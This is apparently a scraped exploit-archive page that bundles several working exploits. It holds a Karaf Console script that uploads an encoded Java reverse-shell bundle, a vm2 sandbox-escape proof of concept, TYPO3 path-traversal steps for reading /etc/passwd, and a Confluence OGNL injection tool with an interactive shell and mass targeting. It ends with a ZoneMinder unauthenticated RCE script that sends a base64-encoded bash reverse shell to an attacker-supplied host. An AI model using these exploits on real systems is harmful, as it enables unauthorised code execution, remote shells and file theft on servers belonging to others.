b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \ b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \ b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \ b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \ b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \ b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \ b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \ b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \ b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \ b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \ b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \ b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \ b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \ b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \ b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \ b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \ b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \ b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \ b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \ b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \ b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \ b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \ b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \ b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \ b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \ b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \ b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \ b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \ b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \ b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \ b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \ b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \ b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \ b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \ b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \ b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \ b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \ b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \ b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \ b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \ b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \ b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \ b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \ b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \ b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \ b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \ b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \ b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \ b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \ b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \ b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \ b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \ b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \ b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \ b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \ b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \ b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \ b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \ b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \ b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \ b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \ b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \ b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \ b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \ b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \ b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \ b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \ b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \ b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \ b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \ b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \ b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \ b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \ b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \ b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \ b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \ b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \ b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \ b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \ b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \ b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \ b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \ b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \ b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \ b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \ b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \ b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \ b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \ b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \ b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \ b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \ b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \ b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \ b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \ b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \ b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \ b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \ b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \ b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \ b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \ b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \ b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \ b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \ b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \ b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \ b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \ b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \ b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \ b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \ b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \ b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \ b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \ b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \ b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \ b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \ b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \ b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \ b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \ b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \ b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \ b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \ b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \ b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \ b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \ b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \ b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \ b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \ b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \ b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \ b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \ b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \ b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \ b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \ b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \ b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \ b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \ b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \ b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \ b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \ b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \ b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \ b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \ b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \ b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \ b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \ b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \ b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \ b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \ b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \ b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \ b"\x32" # Items to be replaces within the bytecode of Activator.class # <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e> ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e" # <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e> ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e" def parse(): """ This function parses the command-line arguments. """ parser = argparse.ArgumentParser( prog="Karaf-Console-RCE", description="This tool will let you open a reverse shell from the " "system that is running Karaf Console", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=True) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=True) parser.add_argument("--creds", dest="creds", help="credentials in format <username:password>", type=str, required=True) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def extract_jsessionid(cookie): """ This function extracts the JSESSIONID from the cookie string. """ jsessionid = None regex = re.findall("JSESSIONID=([^;]+)", cookie) if len(regex) > 0: jsessionid = regex[0] return jsessionid def authenticate(target, basic_auth): """ This function connects to the URL and retrieves the JSESSIONID based on the Basic Authorization. """ jsessionid = None headers = { "Authorization": basic_auth } response = requests.get(target, headers=headers, allow_redirects=False, timeout=10) if (response.status_code == 302 and response.headers["Set-Cookie"]): jsessionid = extract_jsessionid(response.headers["Set-Cookie"]) return jsessionid def generate_payload(lhost, lport): """ This function generates the payload. It replaces the template payload with the `lhost` and `lport` arguments. """ payload = None lhost_byte_array = bytearray() lhost_byte_array.append(len(lhost)) lhost_byte_array.extend(map(ord, lhost)) activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace( ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array) lport_str = str(lport) lport_byte_array = bytearray() lport_byte_array.append(len(lport_str)) lport_byte_array.extend(map(ord, lport_str)) activator_class_bytecodes = activator_class_bytecodes.replace( ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array) jar_bytes = io.BytesIO() with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr("com/visionspace/osgi/revshell/Activator.class", activator_class_bytecodes) zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT) payload = jar_bytes.getvalue() return payload def deploy_payload(target, basic_auth, jsessionid, payload): """ This function connects to the Karaf Console and deployes the payload. """ success = False url = f"{target}/bundles" cookies = { "JSESSIONID": jsessionid } headers = { "Authorization": basic_auth } files = { "bundlefile": ( "revshell.jar", payload, "application/x-java-archive") } data = { "action": "install", "bundlestart": "start", "bundlestartlevel": 80 } response = requests.post(url, headers=headers, cookies=cookies, files=files, data=data, timeout=10, allow_redirects=False) if response.status_code == 302: success = True return success def generate_basic_auth(creds): """ This function generates the Basic Authorization string based on the credentials. """ creds_base64 = base64.b64encode(creds.encode()).decode() basic_auth = f"Basic {creds_base64}" return basic_auth def create_target_url(rhost, rport): """ This function creates a target URL. """ target_url = f"http://{rhost}:{rport}/system/console" return target_url def main(args): """ Main function. """ target = create_target_url(args.rhost, args.rport) print("[*] Login...") basic_auth = generate_basic_auth(args.creds) jsessionid = authenticate(target, basic_auth) if jsessionid: print("[+] Session established.") print("[*] Generating payload...") payload = generate_payload(args.lhost, args.lport) if payload: print("[*] Deploying payload...") if deploy_payload(target, basic_auth, jsessionid, payload): print("[+] Done.") else: print("[-] Failed to deploy the payload!") else: print("[-] Failed to generate the payload!") else: print("[-] Login failed!") if __name__ == "__main__": main(parse())
HireHackking

vm2 - sandbox escape

HACKER · %s · %s

/* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy({}, handler); throw proxiedErr; } catch ({ constructor: c }) { const childProcess = c.constructor('return process')().mainModule.require('child_process'); childProcess.execSync('${command}'); } `; console.log(vm.run(code));
HireHackking

TYPO3 11.5.24 - Path Traversal (Authenticated)

HACKER · %s · %s

# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated) # Date: Apr 9, 2023 # Exploit Author: Saeed reza Zamanian # Software Link: https://get.typo3.org/release-notes/11.5.24 # Version: 11.5.24 # Tested on: Kali 2022.3 # CVE : CVE-2023-30451 In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel), to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through : POST /typo3/record/edit with ../../../ and the parameter data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. ----------------------------------------------------- To exploit this vulnerability, follow these steps: 1. Log in to the administrator panel. 2. Navigate to 'file' > 'Filelist' section. 3. Right-click on a file storage and select 'New.' 4. Set the base URI to "../../../" and save. After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server. To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.
HireHackking

Atlassian Confluence < 8.5.3 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability # Date: 25/1/2024 # Exploit Author: MaanVader # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://www.atlassian.com/software/confluence # Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 # Tested on: 8.5.3 # CVE : CVE-2023-22527 import requests import argparse import urllib3 from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from rich.console import Console # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Argument parsing parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.") parser.add_argument("-u", "--url", help="Single Confluence Server URL") parser.add_argument("-f", "--file", help="File containing list of IP addresses") parser.add_argument("-c", "--command", help="Command to Execute") parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL") args = parser.parse_args() # Rich console for formatted output console = Console() # Function to send payload def send_payload(url, command): headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded' } payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027' '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n') headers['Content-Length'] = str(len(payload)) full_url = f"{url}/template/aui/text-inline.vm" response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False) return response.text.split('<!DOCTYPE html>')[0].strip() # Interactive shell function def interactive_shell(url): session = PromptSession() console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]") while True: try: cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>")) if cmd.lower() in ["exit", "quit"]: break response = send_payload(url, cmd) console.print(response) except KeyboardInterrupt: break except Exception as e: console.print(f"[bold red]Error: {e}[/bold red]") break # Process file function def process_file(file_path): with open(file_path, 'r') as file: for line in file: ip = line.strip() url = f"http://{ip}:8090" console.print(f"Processing {url}") print(send_payload(url, args.command)) # Main execution logic if args.shell and args.url: interactive_shell(args.url) elif args.url and args.command: print(send_payload(args.url, args.command)) elif args.file and args.command: process_file(args.file) else: print("Error: Please provide a valid URL and a command or use the interactive shell option.")
HireHackking

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE

HACKER · %s · %s

import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): print("[>] fetching csrt token") response = requests.get(self.target_uri) self.csrf_magic = self.get_csrf_magic(response) if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic): print(f"[>] recieved the token: {self.csrf_magic}") return True print("[!] unable to fetch or parse token.") return False def get_csrf_magic(self, response): return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None) def execute_command(self, cmd): print("[>] sending payload..") data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic} response = requests.post(f"{self.target_uri}/index.php", data=data) print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload") def exploit(self, payload): if self.fetch_csrf_token(): print(f"[>] executing...") self.execute_command(payload) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-t', '--target-url', required=True, help='target url endpoint') parser.add_argument('-ip', '--local-ip', required=True, help='local ip') parser.add_argument('-p', '--port', required=True, help='port') args = parser.parse_args() # generating the payload ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" ps2 = base64.b64encode(ps1.encode()).decode() payload = f"echo {ps2} | base64 -d | /bin/bash" ZoneMinderExploit(args.target_url).exploit(payload)